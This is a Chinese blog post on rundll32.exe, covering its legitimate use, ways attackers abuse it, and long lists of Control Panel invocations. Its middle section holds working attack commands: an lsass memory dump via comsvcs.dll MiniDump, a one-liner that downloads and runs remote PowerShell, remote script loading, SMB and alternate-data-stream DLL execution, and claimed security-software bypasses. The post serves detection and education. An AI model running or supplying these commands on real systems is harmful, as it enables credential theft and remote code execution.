恶意软件作者通常会编写恶意软件模仿合法的Windows进程。因此,我们可能会看到恶意软件伪装成svchost.exe、rundll32.exe或lsass.exe进程,攻击者利用的就是大多数Windows用户可能都不清楚这些系统进程在正常情况下的行为特征。在这篇文章中,我们将深挖rundll32.exe,以期对其有所了解。
- 关于 Rundll.exe
顾名思义,rundll32.exe可执行文件是用于运行DLL(RUN DLL),即运行动态链接库的。
在MSDN中,对DLL的定义如下:
动态链接库(DLL)是一个模块,其中包含可以由另一个模块(应用程序或DLL)使用的函数和数据。
以下是使用rundll32.exe的最基本语法:
- rundll32
rundll32.exe可执行文件可以是子进程,也可以是父进程,具体要取决于执行的上下文。为了确定一个rundll32.exe实例是否属于恶意,我们需要确认几件事。首先,需要确认启动它的路径,其次是命令行。
合法的RUNDLL32.EXE进程始终位于:
\Windows\System32\rundll32.exe
\Windows\SysWOW64\rundll32.exe(64位系统上的32位版本)
至于rundll32.exe实例的命令行,完全取决于要运行的内容,例如CPL文件、DLL安装等等。
下面我们将详细介绍一系列 rundll32.exe 调用和对应的作用。
案例:
- SHELL32.DLL – “OpenAs_RunDLL”
Rundll32.exe还可以执行DLL中的特定函数。例如,当选择一个文件并右键单击时,将会显示出一个上下文菜单,其中包含多个选项。这里的一个选项是“OpenWith”(打开方式)。在点击后,将会出现一个弹出窗口,可以从系统上安装的应用程序中进行选择。
在此过程的背后,是使用 shell32.dll 和 OpenAs_RunDL 函数启动 rundll32.exe 实用程序,实际上就相当于在后台执行了以下命令:
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL < file_path >
拿修改 hosts 文件举个例子,通过 WIN+R 执行以下命令,即可弹出该选择窗口:
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts
这种在DLL中调用特定函数的行为非常普遍,因此我们恐怕无法将所有函数都了解全面。
- SHELL32.DLL – “Control_RunDLL”
我们发现与shell32.dll一起使用的另一个常见函数是Control_RunDLL或Control_RunDLLAsUser。这两个函数用于运行.CPL文件或控制面板选项。
例如,如果我们要更改计算机的日期和时间,可以从控制面板启动对应的applet。
在后台,Windows实际上是使用以下命令行启动了rundll32.exe实例。
C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\timedate.cpl
打开防火墙:
C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\firewall.cpl
很显然,这里的 CPL 文件也可以被替换成恶意文件,所以一旦出现可疑的路径及文件名,我们就需要结合其它工具来检查它的合法性。
除了检查.CPL文件外,在使用 Control_RunDLL 或 Control_RunDLLAsUser 函数时,应该一并检查所指向的.DLL文件合法性。
- DLL文件的调用
攻击者如果使用合法的 DLL 文件来完成攻击活动,按照传统的检测手段,确实会大大增加防守难度,例如利用 comsvcs.dll 中的 MiniDump 函数对目标进程进行内存转储,从而实现凭证窃取,参考这里:
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full
类似的还有 advpack.dll,原本是用于帮助硬件和软件读取和验证.INF文件,也会被攻击者用做代码执行,参考这里:
c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection c:\360\360.png,DefaultInstall
当然,这些攻击手法在实际使用过程中肯定会有许多变种,用于绕过一些常规的检测方式,比如 MiniDump 函数的调用也可以通过编号 #24 完成,感兴趣的朋友可以看看这里:
- 从 SMB 共享执行 DLL
rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
使用 Rundll32.exe 从 SMB 共享执行 DLL。EntryPoint 是 .DLL 文件中要执行的入口点的名称。
用例:从 SMB 共享执行 DLL。
所需权限: 用户
操作系统:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 执行 JavaScript 脚本
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://www.chwm.vip/?javascript');")
使用 Rundll32.exe 执行 JavaScript 脚本,该脚本运行从以下位置下载的 PowerShell 脚本一个远程网站。
用例:从 Internet 执行代码
所需权限: 用户
操作系统:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 执行运行外部程序
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
使用 Rundll32.exe 执行运行 calc 的 JavaScript 脚本。EXE文件。
用例:代理执行
所需权限: 用户
操作系统:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 执行运行外部程序并杀死 rundll32.exe 进程
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
使用 Rundll32.exe 执行运行 calc.exe 的 JavaScript 脚本并杀死启动的 Rundll32.exe 进程。
用例:代理执行
所需权限: 用户
操作系统:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 执行调用远程 JavaScript 脚本
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://www.chwm.vip/test/test.js")
使用 Rundll32.exe 执行调用远程 JavaScript 的 JavaScript 脚本。
用例:从 Internet 执行代码
所需权限: 用户
操作系统:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 执行 VBScript 脚本代码
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";window.execScript("msgbox('a')","vbs");window.close()
使用 Rundll32.exe 执行调用 VBScript 脚本。
用例:代理执行
所需权限: 用户
操作系统:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 加载已注册或劫持的 COM 服务器
rundll32.exe –localserver < CLSID_GUID >
rundll32.exe –sta < CLSID_GUID >
使用 Rundll32.exe 加载已注册或劫持的 COM 服务器有效负载。也适用于 ProgID。
二者均可以用于加载恶意注册的COM对象。
需要验证相应的注册表项\HKEY_CLASSES_ROOT\CLSID\
推荐大家阅读以下文章,以详细了解这种技术。
https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
- 执行命令绕过安全软件
rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe
rundll32 url.dll, FileProtocolHandler calc.exe
这是经过反汇编分析 Url.dll 得出的结果,可以成功绕开大部分安全软件。
用例:代理执行
所需权限: 用户
操作系统:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 备用数据流
rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
使用 Rundll32.exe 执行存储在备用数据流 (ADS) 中的 .DLL 文件。
用例:从备用数据流执行代码
所需权限: 用户
操作系统:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
- 执行 HTML 代码
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication < HTML Code >
使用 Rundll32.exe 调用 mshtml.dll 运行 HTML 代码。
用例:代理执行
所需权限: 用户
操作系统:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11
其他使用方法
"rundll32 shell32,Control_RunDLL" - 运行控制面板
"rundll32 shell32,OpenAs_RunDLL" - 打开"打开方式"窗口
"rundll32 shell32,ShellAboutA Info-Box" - 打开"关于"窗口
"rundll32 shell32,Control_RunDLL desk.cpl" - 打开"显示属性"窗口
"rundll32 user,cascadechildwindows" - 层叠全部窗口
"rundll32 user,tilechildwindows" - 最小化所有的子窗口
"rundll32 user,repaintscreen" - 刷新桌面
"rundll32 shell,shellexecute Explorer" - 重新运行Windows Explorer
"rundll32 keyboard,disable" - 锁写键盘
"rundll32 mouse,disable" - 让鼠标失效
"rundll32 user,swapmousebutton" - 交换鼠标按钮
"rundll32 user,setcursorpos" - 设置鼠标位置为(0,0)
"rundll32 user,wnetconnectdialog" - 打开"映射网络驱动器"窗口
"rundll32 user,wnetdisconnectdialog" - 打开"断开网络驱动器"窗口
"rundll32 user,disableoemlayer" - 显示BSOD窗口, (BSOD) = Blue Screen Of Death, 即蓝屏
"rundll32 diskcopy,DiskCopyRunDll" - 打开磁盘复制窗口
"rundll32 rnaui.dll,RnaWizard" - 运行"Internet连接向导", 如果加上参数"/1"则为silent模式
"rundll32 shell32,SHFormatDrive" - 打开"格式化磁盘(A)"窗口
"rundll32 shell32,SHExitWindowsEx -1" - 冷启动Windows Explorer
"rundll32 shell32,SHExitWindowsEx 1" - 关机
"rundll32 shell32,SHExitWindowsEx 0" - 退当前用户
"rundll32 shell32,SHExitWindowsEx 2" Windows9x 快速重启
"rundll32 krnl386.exe,exitkernel" - 强行退出Windows 9x(无确认)
"rundll rnaui.dll,RnaDial "MyConnect" - 运行"网络连接"对话框
"rundll32 msprint2.dll,RUNDLL_PrintTestPage" - 选择打印机和打印测试页
"rundll32 user,setcaretblinktime" - 设置光标闪烁速度
"rundll32 user, setdoubleclicktime" - 测试鼠标双击速度
"rundll32 sysdm.cpl,InstallDevice_Rundll" - 搜索非PnP设备
"rundll32.exe user.exe,restartwindows" - 重启电脑
控制面板中的各项功能
winexec('rundll32.exe shell32.dll, Control_RunDLL', 9);
{辅助选项 属性-键盘}
winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 1', 9);
{辅助选项 属性-声音}
winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 2', 9);
{辅助选项 属性-显示}
winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 3', 9);
{辅助选项 属性-鼠标}
winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 4', 9);
{辅助选项 属性-常规}
winexec('rundll32.exe shell32.dll, Control_RunDLL access.cpl, 5', 9);
{添加/删除程序 属性-安装/卸载}
winexec('rundll32.exe shell32.dll, Control_RunDLL Appwiz.cpl, 1', 9);
{添加/删除程序 属性-Windows安装程序}
winexec('rundll32.exe shell32.dll, Control_RunDLL Appwiz.cpl, 2', 9);
{添加/删除程序 属性-启动盘}
winexec('rundll32.exe shell32.dll, Control_RunDLL Appwiz.cpl, 3', 9);
{显示 属性-背景}
winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 0', 9);
{显示 属性-屏幕保护程序}
winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 1', 9);
{显示 属性-外观}
winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 2', 9);
{显示 属性-设置}
winexec('rundll32.exe shell32.dll, Control_RunDLL desk.cpl, 3', 9);
{Internet 属性-常规}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 0', 9);
{Internet 属性-安全}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 1', 9);
{Internet 属性-内容}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 2', 9);
{Internet 属性-连接}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 3', 9);
{Internet 属性-程序}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 4', 9);
{Internet 属性-高级}
winexec('rundll32.exe shell32.dll, Control_RunDLL Inetcpl.cpl, 5', 9);
{区域设置 属性-区域设置}
winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 0', 9);
{区域设置 属性-数字}
winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 1', 9);
{区域设置 属性-货币}
winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 2', 9);
{区域设置 属性-时间}
winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 3', 9);
{区域设置 属性-日期}
winexec('rundll32.exe shell32.dll, Control_RunDLL Intl.cpl, 4', 9);
winexec('rundll32.exe shell32.dll, Control_RunDLL Joy.cpl, 0', 9);
winexec('rundll32.exe shell32.dll, Control_RunDLL Joy.cpl, 1', 9);
{鼠标 属性}
winexec('rundll32.exe shell32.dll, Control_RunDLL Main.cpl', 9);
{多媒体 属性-音频}
winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 0', 9);
{多媒体 属性-视频}
winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 1', 9);
{多媒体 属性-MIDI}
winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 2', 9);
{多媒体 属性-CD音乐}
winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 3', 9);
{多媒体 属性-设备}
winexec('rundll32.exe shell32.dll, Control_RunDLL Mmsys.cpl, 4', 9);
{调制解调器 属性}
winexec('rundll32.exe shell32.dll, Control_RunDLL Modem.cpl', 9);
winexec('rundll32.exe shell32.dll, Control_RunDLL Netcpl.cpl', 9);
{密码 属性}
winexec('rundll32.exe shell32.dll, Control_RunDLL Password.cpl', 9);
{扫描仪与数字相机 属性}
winexec('rundll32.exe shell32.dll, Control_RunDLL Sticpl.cpl', 9);
{系统 属性-常规}
winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 0', 9);
{系统 属性-设备管理器}
winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 1', 9);
{系统 属性-硬件配置文件}
winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 2', 9);
{系统 属性-性能}
winexec('rundll32.exe shell32.dll, Control_RunDLL Sysdm.cpl, 3', 9);
{日期/时间 属性}
winexec('rundll32.exe shell32.dll, Control_RunDLL timedate.cpl', 9);
{电源管理 属性}
winexec('rundll32.exe shell32.dll, Control_RunDLL Powercfg.cpl', 9);
命令列: rundll32.exe shell32.dll,Control_RunDLL
功能: 显示控制面板
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1
功能: 显示“控制面板-辅助选项-键盘”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2
功能: 显示“控制面板-辅助选项-声音”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3
功能: 显示“控制面板-辅助选项-显示”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4
功能: 显示“控制面板-辅助选项-滑鼠”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5
功能: 显示“控制面板-辅助选项-传统”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1
功能: 执行“控制面板-添加新硬体”向导。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter
功能: 执行“控制面板-添加新印表机”向导。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1
功能: 显示 “控制面板-添加/删除程式-安装/卸载” 面板。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2
功能: 显示 “控制面板-添加/删除程式-安装Windows” 面板。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3
功能: 显示 “控制面板-添加/删除程式-启动盘” 面板。
命令列: rundll32.exe syncui.dll,Briefcase_Create
功能: 在桌面上建立一个新的“我的公文包”。
命令列: rundll32.exe diskcopy.dll,DiskCopyRunDll
功能: 显示复制软碟视窗
命令列: rundll32.exe apwiz.cpl,NewLinkHere %1
功能: 显示“建立快捷方式”的对话框,所建立的快捷方式的位置由%1参数决定。
命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,0
功能: 显示“日期与时间”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1
功能: 显示“时区”选项视窗。
命令列: rundll32.exe rnaui.dll,RnaDial [某个拨号连接的名称]
功能: 显示某个拨号连接的拨号视窗。如果已经拨号连接,则显示目前的连接状态的视窗。
命令列: rundll32.exe rnaui.dll,RnaWizard
功能: 显示“新建拨号连接”向导的视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0
功能: 显示“显示属性-背景”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1
功能: 显示“显示属性-萤屏保护”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2
功能: 显示“显示属性-外观”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3
功能: 显示显示“显示属性-属性”选项视窗。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder
功能: 显示Windows的“字体”档案夹。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
功能: 同样是显示Windows的“字体”档案夹。
命令列: rundll32.exe shell32.dll,SHformatDrive
功能: 显示格式化软碟对话框。
命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,0
功能: 显示“控制面板-游戏控制器-一般”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,1
功能: 显示“控制面板-游戏控制器-进阶”选项视窗。
命令列: rundll32.exe mshtml.dll,PrintHTML (HTML文档)
功能: 列印HTML文档。
命令列: rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl
功能: 显示Microsoft Exchange一般选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @0
功能: 显示“控制面板-滑鼠” 选项 。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1
功能: 显示 “控制面板-键盘属性-速度”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1,,1
功能: 显示 “控制面板-键盘属性-语言”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @2
功能: 显示Windows“印表机”档案夹。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
功能: 显示Windows“字体”档案夹。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @4
功能: 显示“控制面板-输入法属性-输入法”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL modem.cpl,,add
功能: 执行“添加新调制解调器”向导。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0
功能: 显示“控制面板-多媒体属性-音频”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1
功能: 显示“控制面板-多媒体属性-视频”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2
功能: 显示“控制面板-多媒体属性-MIDI”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3
功能: 显示“控制面板-多媒体属性-CD音乐”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4
功能: 显示“控制面板-多媒体属性-设备”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1
功能: 显示“控制面板-声音”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl
功能: 显示“控制面板-网路”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl
功能: 显示ODBC32资料管理选项视窗。
命令列: rundll32.exe shell32.dll,OpenAs_RunDLL
功能: 显示指定档案(drive:pathfilename)的“打开方式”对话框。
命令列: rundll32.exe shell32.dll,Control_RunDLL password.cpl
功能: 显示“控制面板-密码”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl
功能: 显示“控制面板-电源管理属性”选项视窗。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder
功能: 显示Windows“印表机”档案夹。(同rundll32.exe shell32.dll,Control_RunDLL main.cpl
@2)
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0
功能: 显示“控制面板-区域设置属性-区域设置”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1
功能: 显示“控制面板-区域设置属性-数字”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2
功能: 显示“控制面板-区域设置属性-货币”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3
功能: 显示“控制面板-区域设置属性-时间”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4
功能: 显示“控制面板-区域设置属性-日期”选项视窗。
命令列: rundll32.exe desk.cpl,InstallScreenSaver [萤屏保护档案名]
功能: 将指定的萤屏保护档案设置为Windows的屏保,并显示萤屏保护属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0
功能: 显示“控制面板-系统属性-传统”属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
功能: 显示“控制面板-系统属性-设备管理器”属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
功能: 显示“控制面板-系统属性-硬体配置档案”属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
功能: 显示“控制面板-系统属性-性能”属性视窗。
命令列: rundll32.exe user.exe,restartwindows
功能: 强行关闭所有程式并重启机器。
命令列: rundll32.exe user.exe,exitwindows
功能: 强行关闭所有程式并关机。
命令列: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl
功能: 显示“拨号属性”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL themes.cpl
功能: 显示“桌面主旨”选项面板
总结
感谢大家的阅读,希望能通过本篇文章对 Rundll32.exe 有所了解。
Rundll32.exe 还有更多利用的方法,本文将持续更新。。。
标签:Control,exe,深挖,dll,shell32,RunDLL,Rundll32,rundll32 From: https://www.cnblogs.com/RainbowTechnology/p/17969806